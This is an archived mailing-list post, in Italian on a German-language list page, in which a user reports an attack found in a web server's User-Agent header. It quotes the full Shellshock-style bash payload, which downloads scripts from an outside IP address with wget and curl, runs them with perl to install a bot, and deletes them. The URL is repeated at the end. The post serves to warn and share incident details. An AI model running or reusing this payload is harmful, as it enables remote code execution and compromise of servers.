[Ciotoflow] attacco che sfrutta variabile user-agent

Diese Nachricht ist Teil des folgenden Threads:
MDer komplette Thread sortiert nach Datum
M 
int80h am ->
Nachricht löschen

Nachricht beantworten
Autor: Giuseppe De Marco
Datum:  
To: Flussi di ciotia.
Betreff: [Ciotoflow] attacco che sfrutta variabile user-agent
nello user agent guarda un pò che hanno ficcato:

'() { :;}; /bin/bash -c "wget -O /tmp/s http://178.18.24.165/s;curl -O
/tmp/s http://178.18.24.165/s;perl /tmp/s;rm -rf /tmp/s*;wget -O
/tmp/e http://178.18.24.165/e;curl -O /tmp/e
http://178.18.24.165/e;perl /tmp/e;rm -rf /tmp/e"'

tututo per eseguire sto bot

http://178.18.24.165/s
Diese Nachricht wurde auf der folgenden Mailing-List gepostet:
ciotoflow
Mailing-List-Info | Nachrichten um die Zeit		<-[Ciotoflow] linux mint backdoor ready !Re: [Ciotoflow] attacco che sfrutta variabile user-agent->
lists.autistici.org administriert von postmasterLurker (Version 2.3)